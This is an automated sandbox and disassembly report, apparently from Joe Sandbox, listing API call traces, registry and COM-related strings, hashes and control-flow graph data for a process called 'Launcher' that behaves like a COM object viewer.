                                                                                                                • #861.MFC42U(00B521A0,00B521A0,?,00000100,?,?,?,?,?), ref: 00B5F851
                                                                                                                • #2634.MFC42U(00000000,00B521A0,00B521A0,?,00000100,?,?,?,?,?), ref: 00B5F85E
                                                                                                                • lstrcmpiW.KERNEL32(?,BOTH,?,?,00000000,00B521A0,00B521A0,?,00000100,?,?,?,?,?), ref: 00B5F8AA
                                                                                                                • lstrcmpiW.KERNEL32(?,FREE,?,?,00000000,00B521A0,00B521A0,?,00000100,?,?,?,?,?), ref: 00B5F8C7
                                                                                                                • lstrcmpiW.KERNEL32(?,APARTMENT,?,?,00000000,00B521A0,00B521A0,?,00000100,?,?,?,?,?), ref: 00B5F8E4
                                                                                                                • lstrcmpiW.KERNEL32(?,NEUTRAL,?,?,00000000,00B521A0,00B521A0,?,00000100,?,?,?,?,?), ref: 00B5F901
                                                                                                                • SendMessageW.USER32(?,0000014D,000000FF,None), ref: 00B5F939
                                                                                                                • #861.MFC42U(?,00B521A0,?,00000100,?,?,?,?,?), ref: 00B5F9DD
                                                                                                                • #2756.MFC42U(msjava.dll,?,00B521A0,?,00000100,?,?,?,?,?), ref: 00B5F9E9
                                                                                                                • #2756.MFC42U(MSJAVA.DLL,msjava.dll,?,00B521A0,?,00000100,?,?,?,?,?), ref: 00B5F9FA
                                                                                                                • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00B5FA13
                                                                                                                • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00B5FA2A
                                                                                                                • #861.MFC42U(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B5FA7D
                                                                                                                • #2634.MFC42U(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B5FA97
                                                                                                                • lstrcmpiW.KERNEL32(?,BOTH,?,?,?,00000000), ref: 00B5FAE3
                                                                                                                • lstrcmpiW.KERNEL32(?,FREE,?,?,?,00000000), ref: 00B5FB00
                                                                                                                • lstrcmpiW.KERNEL32(?,APARTMENT,?,?,?,00000000), ref: 00B5FB1D
                                                                                                                • lstrcmpiW.KERNEL32(?,NEUTRAL,?,?,?,00000000), ref: 00B5FB3A
                                                                                                                • SendMessageW.USER32(?,0000014D,000000FF,None), ref: 00B5FB72
                                                                                                                • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00B5FBBF
                                                                                                                • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00B5FBD8
                                                                                                                • #861.MFC42U(00B521A0,?,?,?,?,?,?,?,00000000), ref: 00B5FBEC
                                                                                                                • #3087.MFC42U(00001FA5,00B521A0,?,?,?,?,?,?,?,00000000), ref: 00B5FBF8
                                                                                                                • #2634.MFC42U(00000000,00001FA5,00B521A0,?,?,?,?,?,?,?,00000000), ref: 00B5FC00
                                                                                                                • #3087.MFC42U(0000009C,00000000,00001FA5,00B521A0,?,?,?,?,?,?,?,00000000), ref: 00B5FC0C
                                                                                                                • #2634.MFC42U(00000000,0000009C,00000000,00001FA5,00B521A0,?,?,?,?,?,?,?,00000000), ref: 00B5FC14
                                                                                                                • #2634.MFC42U(00000001,00000000,0000009C,00000000,00001FA5,00B521A0,?,?,?,?,?,?,?,00000000), ref: 00B5FC21
                                                                                                                • #2634.MFC42U(00000001,00000001,00000000,0000009C,00000000,00001FA5,00B521A0,?,?,?,?,?,?,?,00000000), ref: 00B5FC2E
                                                                                                                • #6330.MFC42U(00000000,00000001,00000001,00000000,0000009C,00000000,00001FA5,00B521A0,?,?,?,?,?,?,?,00000000), ref: 00B5FC45
                                                                                                                • #800.MFC42U(00000000,00000001,00000001,00000000,0000009C,00000000,00001FA5,00B521A0,?,?,?,?,?,?,?,00000000), ref: 00B5FC50
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2634#861lstrcmpi$MessageSend$#3087$#2756$#540#6195#6330#800FromH_prolog3_String
                                                                                                                • String ID: APARTMENT$Apartment$AppID$BOTH$Both$DllSurrogate$FREE$Free$InProcHandler32$InProcServer32$JavaClass$LocalServer32$LocalService$MSJAVA.DLL$NEUTRAL$Neutral$None$ServiceParameters$ThreadingModel$TreatAs$msjava.dll
                                                                                                                • API String ID: 3203418238-4284008715
                                                                                                                • Opcode ID: d01a2efea1b93dcab5d7a19f8e0a250bbacdc3f39f5f965de34e18691386a264
                                                                                                                • Instruction ID: 3445f56addafab3750868916b19fd68aacf7ced52b5a7f902a1e44e7fcc8b452
                                                                                                                • Opcode Fuzzy Hash: d01a2efea1b93dcab5d7a19f8e0a250bbacdc3f39f5f965de34e18691386a264
                                                                                                                • Instruction Fuzzy Hash: B6F19731640319E6DB11EF20CD8AFEA73E9AF15B42F0405F5BD19AB1D1DBB19A8C8B50

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 00B5BBA0
                                                                                                                • #540.MFC42U(00000A30,00B61EC1,00000000,?,00000001), ref: 00B5BBB4
                                                                                                                • #4155.MFC42U(00000004,00000A30,00B61EC1,00000000,?,00000001), ref: 00B5BBC6
                                                                                                                • StringFromGUID2.OLE32(00B51980,?), ref: 00B5BBEB
                                                                                                                • wsprintfW.USER32 ref: 00B5BC04
                                                                                                                • RegQueryValueW.ADVAPI32(80000000,?,?,?), ref: 00B5BC27
                                                                                                                • #3516.MFC42U(?,Version,00000000), ref: 00B5BC42
                                                                                                                • #540.MFC42U(00000004,00000A30,00B61EC1,00000000,?,00000001), ref: 00B5BC56
                                                                                                                • #540.MFC42U(00000004,00000A30,00B61EC1,00000000,?,00000001), ref: 00B5BC64
                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,00000004,00000A30,00B61EC1,00000000,?,00000001), ref: 00B5BC7A
                                                                                                                • wcsrchr.MSVCRT ref: 00B5BC92
                                                                                                                • lstrcpyW.KERNEL32(-00000002,IVIEWERS.DLL), ref: 00B5BCA3
                                                                                                                • #538.MFC42U(?), ref: 00B5BCB6
                                                                                                                • #4155.MFC42U(00000012), ref: 00B5BCD2
                                                                                                                • #4155.MFC42U(00000013,00000012), ref: 00B5BCDF
                                                                                                                • #940.MFC42U(?,00000013,00000012), ref: 00B5BCF1
                                                                                                                • #4155.MFC42U(00000015,?,00000013,00000012), ref: 00B5BCFE
                                                                                                                • #940.MFC42U(?,00000015,?,00000013,00000012), ref: 00B5BD10
                                                                                                                • #1197.MFC42U(?,00000004,00000000,?,00000015,?,00000013,00000012), ref: 00B5BD1F
                                                                                                                • #355.MFC42U(00000001,iviewers.dll,00000000,00001804,DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|,?,?,00000004,00000000,?,00000015,?,00000013,00000012), ref: 00B5BD4B
                                                                                                                • #2507.MFC42U(00000001,iviewers.dll,00000000,00001804,DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|,?,?,00000004,00000000,?,00000015,?,00000013,00000012), ref: 00B5BD5A
                                                                                                                • #3494.MFC42U(?,00000001,iviewers.dll,00000000,00001804,DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|,?,?,00000004,00000000,?,00000015,?,00000013,00000012), ref: 00B5BD74
                                                                                                                • #858.MFC42U(00000000,?,00000001,iviewers.dll,00000000,00001804,DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|,?,?,00000004,00000000,?,00000015,?,00000013,00000012), ref: 00B5BD84
                                                                                                                • #800.MFC42U(00000000,?,00000001,iviewers.dll,00000000,00001804,DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|,?,?,00000004,00000000,?,00000015,?,00000013,00000012), ref: 00B5BD8F
                                                                                                                • #800.MFC42U(00000000,?,00000001,iviewers.dll,00000000,00001804,DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|,?,?,00000004,00000000,?,00000015,?,00000013,00000012), ref: 00B5BD9E
                                                                                                                • #641.MFC42U(00000000,?,00000001,iviewers.dll,00000000,00001804,DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|,?,?,00000004,00000000,?,00000015,?,00000013,00000012), ref: 00B5BDA9
                                                                                                                • LoadLibraryW.KERNEL32(?,?), ref: 00B5BDB4
                                                                                                                • GetProcAddress.KERNEL32(00000000,DllRegisterServer), ref: 00B5BDCB
                                                                                                                • #800.MFC42U(00000001,iviewers.dll,00000000,00001804,DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|,?,?,00000004,00000000,?,00000015,?,00000013,00000012), ref: 00B5BDF3
                                                                                                                • #641.MFC42U(00000001,iviewers.dll,00000000,00001804,DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|,?,?,00000004,00000000,?,00000015,?,00000013,00000012), ref: 00B5BDFE
                                                                                                                • #4155.MFC42U(00000014), ref: 00B5BE11
                                                                                                                • #4155.MFC42U(00000013,00000014), ref: 00B5BE1E
                                                                                                                • #940.MFC42U(?,00000013,00000014), ref: 00B5BE30
                                                                                                                • #1197.MFC42U(?,00000000,00000000,?,00000013,00000014), ref: 00B5BE3F
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000000,00000000,?,00000013,00000014), ref: 00B5BE4B
                                                                                                                • RegOpenKeyExW.ADVAPI32(80000000,Interface,00000000,000F003F,?,?,00000004,00000000,?,00000015,?,00000013,00000012), ref: 00B5BE69
                                                                                                                • StringFromGUID2.OLE32(00B59E6C,?,00000031), ref: 00B5BE84
                                                                                                                • StringFromGUID2.OLE32(00B59E7C,?,00000031,?,?,00000000,IClientSecurity), ref: 00B5BEAA
                                                                                                                • StringFromGUID2.OLE32(00B59E8C,?,00000031,?,?,00000000,IServerSecurity), ref: 00B5BED0
                                                                                                                • StringFromGUID2.OLE32(00B59E5C,?,00000031,?,?,00000000,IMallocSpy), ref: 00B5BEF6
                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,00000000,IMultiQI), ref: 00B5BF18
                                                                                                                • #6398.MFC42U(?,Version,0000003D), ref: 00B5BF34
                                                                                                                • #800.MFC42U(?,Version,0000003D), ref: 00B5BF3F
                                                                                                                • #800.MFC42U(?,Version,0000003D), ref: 00B5BF4A
                                                                                                                • #800.MFC42U(?,Version,0000003D), ref: 00B5BF55
                                                                                                                • #800.MFC42U(?,Version,0000003D), ref: 00B5BF62
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #800$#4155$FromString$#540#940$#1197#641Library$#2507#3494#3516#355#538#6398#858AddressCloseFileFreeH_prolog3_LoadModuleNameOpenProcQueryValuelstrcpywcsrchrwsprintf
                                                                                                                • String ID: Component Categories\%s$DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|$DllRegisterServer$IClientSecurity$IMallocSpy$IMultiQI$IServerSecurity$IVIEWERS.DLL$Interface$Version$iviewers.dll
                                                                                                                • API String ID: 2887186624-2619698232
                                                                                                                • Opcode ID: c768efa720c2d1741775f930edc8de77c695c63c48cfb025bd9294eabe983cb7
                                                                                                                • Instruction ID: 27bdd5109bd11bf311a9159f1b6cf588ec2996e411dcd862db141fea6e7b5ab1
                                                                                                                • Opcode Fuzzy Hash: c768efa720c2d1741775f930edc8de77c695c63c48cfb025bd9294eabe983cb7
                                                                                                                • Instruction Fuzzy Hash: 1AA15D32A40218AADB21EB64DC56FDD77B8AB19701F1040E5F60AB70E1DB755F89CF12

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 240 b67a11-b67a3e 241 b67a47-b67a67 CLSIDFromString 240->241 242 b67a40-b67a42 240->242 244 b67a70-b67ab0 wsprintfW RegOpenKeyW 241->244 245 b67a69-b67a6b 241->245 243 b67efd-b67f08 call b6f3a0 242->243 247 b67ab6-b67ace call b679b1 244->247 248 b67efb 244->248 245->243 252 b67ad0-b67add 247->252 253 b67adf-b67ae5 247->253 248->243 254 b67aec-b67b17 RegQueryValueW 252->254 253->254 255 b67b1d-b67b36 _wcsnicmp 254->255 256 b67bb8-b67bd9 RegQueryValueW 254->256 257 b67bb3 255->257 258 b67b38-b67b4c lstrcmpiW 255->258 259 b67c42-b67c5c RegOpenKeyW 256->259 260 b67bdb-b67bf4 _wcsnicmp 256->260 257->259 261 b67ba6-b67bac 258->261 262 b67b4e-b67b62 lstrcmpiW 258->262 264 b67c5e-b67c65 259->264 265 b67c99-b67cb3 RegOpenKeyW 259->265 260->259 263 b67bf6-b67c0a lstrcmpiW 260->263 261->257 262->261 268 b67b64-b67b78 lstrcmpiW 262->268 271 b67c0c-b67c20 lstrcmpiW 263->271 272 b67c38-b67c3e 263->272 266 b67c76-b67c7c 264->266 267 b67c67-b67c74 264->267 269 b67cb5-b67cbc 265->269 270 b67cf0-b67d0a RegOpenKeyW 265->270 273 b67c83-b67c8f RegCloseKey 266->273 267->273 268->261 274 b67b7a-b67b8e lstrcmpiW 268->274 275 b67cbe-b67ccb 269->275 276 b67ccd-b67cd3 269->276 277 b67d47-b67d81 RegCloseKey RegQueryValueW 270->277 278 b67d0c-b67d13 270->278 271->272 279 b67c22-b67c36 lstrcmpiW 271->279 272->259 280 b67e65-b67ea2 RegQueryValueW 273->280 274->261 281 b67b90-b67ba4 lstrcmpiW 274->281 282 b67cda-b67ce6 RegCloseKey 275->282 276->282 277->280 285 b67d87-b67dc1 wsprintfW RegOpenKeyW 277->285 283 b67d24-b67d2a 278->283 284 b67d15-b67d22 278->284 279->259 279->272 286 b67ec7-b67eda #861 280->286 287 b67ea4-b67ec5 RegQueryValueW 280->287 281->257 281->261 282->280 288 b67d31-b67d3d RegCloseKey 283->288 284->288 289 b67dc3-b67dca 285->289 290 b67df8-b67e32 wsprintfW RegOpenKeyW 285->290 294 b67edf-b67ee6 286->294 287->286 287->294 288->280 291 b67dcc-b67dd9 289->291 292 b67ddb-b67de1 289->292 290->280 293 b67e34-b67e3b 290->293 295 b67de8-b67df4 RegCloseKey 291->295 292->295 296 b67e4c-b67e52 293->296 297 b67e3d-b67e4a 293->297 298 b67ef4-b67ef7 294->298 299 b67ee8-b67eee RegCloseKey 294->299 295->280 300 b67e59-b67e5f RegCloseKey 296->300 297->300 298->243 299->298 300->280
                                                                                                                APIs
                                                                                                                • CLSIDFromString.OLE32(00000000,?), ref: 00B67A54
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FromString
                                                                                                                • String ID: %s\Insertable$%s\NotInsertable$($2.dll$2disp.dll$2pr32.dll$2prox.dll$32.dll$CLSID\%s$Control$InprocServer$InprocServer32$Insertable$Ole1Class$ProgID$ToolboxBitmap$ToolboxBitmap32$aut32.dll$cnv32.dll$ole$prx32.dll
                                                                                                                • API String ID: 1694596556-344945948
                                                                                                                • Opcode ID: 660c49da550d351808a674a760577b7a970bd69766b6f614e90a0d917e88dc80
                                                                                                                • Instruction ID: 78c06145c2ef001351f31c459e491781162c2e7eacf642f63e806ddadab40cfe
                                                                                                                • Opcode Fuzzy Hash: 660c49da550d351808a674a760577b7a970bd69766b6f614e90a0d917e88dc80
                                                                                                                • Instruction Fuzzy Hash: 5DD1E5B1984218AFDB20DB64DC8DBD977F8FB1430AF1405E5E919A21A1DB789EC88F50

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • #3087.MFC42U(000000B2,00000000,?,00000000,?,00B5FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,00B521A0), ref: 00B6024A
                                                                                                                • #6211.MFC42U(000000B2,00000000,?,00000000,?,00B5FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,00B521A0), ref: 00B60251
                                                                                                                • #3087.MFC42U(00000089,00000000,000000B2,00000000,?,00000000,?,00B5FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,00B521A0), ref: 00B6025E
                                                                                                                • #6211.MFC42U(00000089,00000000,000000B2,00000000,?,00000000,?,00B5FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,00B521A0), ref: 00B60265
                                                                                                                • #3087.MFC42U(000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000,?,00B5FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5), ref: 00B60272
                                                                                                                • #6211.MFC42U(000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000,?,00B5FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5), ref: 00B60279
                                                                                                                • #3087.MFC42U(0000008B,00000005,000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000,?,00B5FC41,00000001,00000001,00000000,0000009C), ref: 00B60289
                                                                                                                • #6211.MFC42U(0000008B,00000005,000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000,?,00B5FC41,00000001,00000001,00000000,0000009C), ref: 00B60290
                                                                                                                • #3087.MFC42U(000000B7,00000000,0000008B,00000000,000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000,?,00B5FC41,00000001,00000001), ref: 00B6029D
                                                                                                                • #6211.MFC42U(000000B7,00000000,0000008B,00000000,000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000,?,00B5FC41,00000001,00000001), ref: 00B602A4
                                                                                                                • #3087.MFC42U(000000B1,00000000,000000B7,00000000,0000008B,00000000,000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000,?,00B5FC41), ref: 00B602B1
                                                                                                                • #6211.MFC42U(000000B1,00000000,000000B7,00000000,0000008B,00000000,000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000,?,00B5FC41), ref: 00B602B8
                                                                                                                • #3087.MFC42U(000000B5,00000000,000000B1,00000000,000000B7,00000000,0000008B,00000000,000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000), ref: 00B602C5
                                                                                                                • #6211.MFC42U(000000B5,00000000,000000B1,00000000,000000B7,00000000,0000008B,00000000,000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000), ref: 00B602CC
                                                                                                                • #3087.MFC42U(00001FA5,00000000,000000B5,00000000,000000B1,00000000,000000B7,00000000,0000008B,00000000,000000B6,00000000,00000089,00000000,000000B2,00000000), ref: 00B602D9
                                                                                                                • #6211.MFC42U(00001FA5,00000000,000000B5,00000000,000000B1,00000000,000000B7,00000000,0000008B,00000000,000000B6,00000000,00000089,00000000,000000B2,00000000), ref: 00B602E0
                                                                                                                • #3087.MFC42U(000000B2,00000000,?,00000000,?,00B5FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,00B521A0), ref: 00B602F1
                                                                                                                • #6211.MFC42U(000000B2,00000000,?,00000000,?,00B5FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,00B521A0), ref: 00B602F8
                                                                                                                • #3087.MFC42U(00000089,00000005,000000B2,00000000,?,00000000,?,00B5FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,00B521A0), ref: 00B60308
                                                                                                                • #6211.MFC42U(00000089,00000005,000000B2,00000000,?,00000000,?,00B5FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,00B521A0), ref: 00B6030F
                                                                                                                • #3087.MFC42U(000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000,?,00B5FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5), ref: 00B6031C
                                                                                                                • #6211.MFC42U(000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000,?,00B5FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5), ref: 00B60323
                                                                                                                • #3087.MFC42U(0000008B,00000000,000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000,?,00B5FC41,00000001,00000001,00000000,0000009C), ref: 00B60330
                                                                                                                • #6211.MFC42U(0000008B,00000000,000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000,?,00B5FC41,00000001,00000001,00000000,0000009C), ref: 00B60337
                                                                                                                • #3087.MFC42U(000000B2,00000000,?,00000000,?,00B5FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,00B521A0), ref: 00B60348
                                                                                                                • #6211.MFC42U(000000B2,00000000,?,00000000,?,00B5FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,00B521A0), ref: 00B6034F
                                                                                                                • #3087.MFC42U(00000089,00000000,000000B2,00000000,?,00000000,?,00B5FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,00B521A0), ref: 00B6035C
                                                                                                                • #6211.MFC42U(00000089,00000000,000000B2,00000000,?,00000000,?,00B5FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,00B521A0), ref: 00B60363
                                                                                                                • #3087.MFC42U(000000B2,00000005,?,00000000,?,00B5FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,00B521A0), ref: 00B60374
                                                                                                                • #6211.MFC42U(000000B2,00000005,?,00000000,?,00B5FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,00B521A0), ref: 00B6037B
                                                                                                                • #3087.MFC42U(00000089,00000005,000000B2,00000005,?,00000000,?,00B5FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,00B521A0), ref: 00B60388
                                                                                                                • #6211.MFC42U(00000089,00000005,000000B2,00000005,?,00000000,?,00B5FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,00B521A0), ref: 00B6038F
                                                                                                                • #3087.MFC42U(000000B6,00000005,00000089,00000005,000000B2,00000005,?,00000000,?,00B5FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5), ref: 00B6039C
                                                                                                                • #6211.MFC42U(000000B6,00000005,00000089,00000005,000000B2,00000005,?,00000000,?,00B5FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5), ref: 00B603A3
                                                                                                                • #3087.MFC42U(0000008B,00000000,000000B6,00000005,00000089,00000005,000000B2,00000005,?,00000000,?,00B5FC41,00000001,00000001,00000000,0000009C), ref: 00B603B0
                                                                                                                • #6211.MFC42U(0000008B,00000000,000000B6,00000005,00000089,00000005,000000B2,00000005,?,00000000,?,00B5FC41,00000001,00000001,00000000,0000009C), ref: 00B603B7
                                                                                                                • #3087.MFC42U(000000B7,00000000,0000008B,00000000,000000B6,00000005,00000089,00000005,000000B2,00000005,?,00000000,?,00B5FC41,00000001,00000001), ref: 00B603C4
                                                                                                                • #6211.MFC42U(000000B7,00000000,0000008B,00000000,000000B6,00000005,00000089,00000005,000000B2,00000005,?,00000000,?,00B5FC41,00000001,00000001), ref: 00B603CB
                                                                                                                • #3087.MFC42U(000000B1,00000005,000000B7,00000000,0000008B,00000000,000000B6,00000005,00000089,00000005,000000B2,00000005,?,00000000,?,00B5FC41), ref: 00B603D8
                                                                                                                • #6211.MFC42U(000000B1,00000005,000000B7,00000000,0000008B,00000000,000000B6,00000005,00000089,00000005,000000B2,00000005,?,00000000,?,00B5FC41), ref: 00B603DF
                                                                                                                • #3087.MFC42U(000000B5,00000005,000000B1,00000005,000000B7,00000000,0000008B,00000000,000000B6,00000005,00000089,00000005,000000B2,00000005,?,00000000), ref: 00B603EC
                                                                                                                • #6211.MFC42U(000000B5,00000005,000000B1,00000005,000000B7,00000000,0000008B,00000000,000000B6,00000005,00000089,00000005,000000B2,00000005,?,00000000), ref: 00B603F3
                                                                                                                • #3087.MFC42U(00001FA5,00000005,000000B5,00000005,000000B1,00000005,000000B7,00000000,0000008B,00000000,000000B6,00000005,00000089,00000005,000000B2,00000005), ref: 00B60400
                                                                                                                • #6211.MFC42U(00001FA5,00000005,000000B5,00000005,000000B1,00000005,000000B7,00000000,0000008B,00000000,000000B6,00000005,00000089,00000005,000000B2,00000005), ref: 00B60407
                                                                                                                • #3087.MFC42U(0000009C,00000005,00001FA5,00000005,000000B5,00000005,000000B1,00000005,000000B7,00000000,0000008B,00000000,000000B6,00000005,00000089,00000005), ref: 00B60414
                                                                                                                • #6211.MFC42U(0000009C,00000005,00001FA5,00000005,000000B5,00000005,000000B1,00000005,000000B7,00000000,0000008B,00000000,000000B6,00000005,00000089,00000005), ref: 00B6041B
                                                                                                                • #3087.MFC42U(000000B1,00000000,0000009C,00000005,00001FA5,00000005,000000B5,00000005,000000B1,00000005,000000B7,00000000,0000008B,00000000,000000B6,00000005), ref: 00B60431
                                                                                                                • #2634.MFC42U(000000B1,00000000,0000009C,00000005,00001FA5,00000005,000000B5,00000005,000000B1,00000005,000000B7,00000000,0000008B,00000000,000000B6,00000005), ref: 00B60438
                                                                                                                • #3087.MFC42U(00001FA5,00000000,000000B1,00000000,0000009C,00000005,00001FA5,00000005,000000B5,00000005,000000B1,00000005,000000B7,00000000,0000008B,00000000), ref: 00B60445
                                                                                                                • #2634.MFC42U(00001FA5,00000000,000000B1,00000000,0000009C,00000005,00001FA5,00000005,000000B5,00000005,000000B1,00000005,000000B7,00000000,0000008B,00000000), ref: 00B6044C
                                                                                                                • #3087.MFC42U(000000B5,00000000,00001FA5,00000000,000000B1,00000000,0000009C,00000005,00001FA5,00000005,000000B5,00000005,000000B1,00000005,000000B7,00000000), ref: 00B60459
                                                                                                                • #2634.MFC42U(000000B5,00000000,00001FA5,00000000,000000B1,00000000,0000009C,00000005,00001FA5,00000005,000000B5,00000005,000000B1,00000005,000000B7,00000000), ref: 00B60460
                                                                                                                • #3087.MFC42U(0000009C,00000000,000000B5,00000000,00001FA5,00000000,000000B1,00000000,0000009C,00000005,00001FA5,00000005,000000B5,00000005,000000B1,00000005), ref: 00B6046D
                                                                                                                • #2634.MFC42U(0000009C,00000000,000000B5,00000000,00001FA5,00000000,000000B1,00000000,0000009C,00000005,00001FA5,00000005,000000B5,00000005,000000B1,00000005), ref: 00B60474
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #3087$#6211$#2634
                                                                                                                • String ID:
                                                                                                                • API String ID: 3514023408-0
                                                                                                                • Opcode ID: 688f35bf200e3585816cfc7a74ba64ec77871d7808c95518bdd102572500ffc5
                                                                                                                • Instruction ID: 8a8b9bc10da2ff4349ea9301b896f8ad731e5fbe28b60361301cead4e0e9317d
                                                                                                                • Opcode Fuzzy Hash: 688f35bf200e3585816cfc7a74ba64ec77871d7808c95518bdd102572500ffc5
                                                                                                                • Instruction Fuzzy Hash: BA418858B807A426FD193279086BF7E24DA8BD5B85F0044A8B2265F3D3DE5DCE0143BE

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • #4704.MFC42U ref: 00B5FCED
                                                                                                                • SendMessageW.USER32(?,00000143,00000000,None), ref: 00B5FD06
                                                                                                                • SendMessageW.USER32(?,00000143,00000000,Both), ref: 00B5FD19
                                                                                                                • SendMessageW.USER32(?,00000143,00000000,Free), ref: 00B5FD2C
                                                                                                                • SendMessageW.USER32(?,00000143,00000000,Apartment), ref: 00B5FD3F
                                                                                                                • SendMessageW.USER32(?,00000143,00000000,Neutral), ref: 00B5FD52
                                                                                                                • SendMessageW.USER32(?,0000133E,00000000,?), ref: 00B5FD84
                                                                                                                • SendMessageW.USER32(?,0000133E,00000001,00000001), ref: 00B5FD9E
                                                                                                                • SendMessageW.USER32(?,0000133E,00000002,00000001), ref: 00B5FDB8
                                                                                                                • #3087.MFC42U(0000008B,00000000), ref: 00B5FDC6
                                                                                                                • #2634.MFC42U(0000008B,00000000), ref: 00B5FDCD
                                                                                                                • #3087.MFC42U(000000A9,00000000,0000008B,00000000), ref: 00B5FDDA
                                                                                                                • #2634.MFC42U(000000A9,00000000,0000008B,00000000), ref: 00B5FDE1
                                                                                                                • #3087.MFC42U(000000AC,00000000,000000A9,00000000,0000008B,00000000), ref: 00B5FDEE
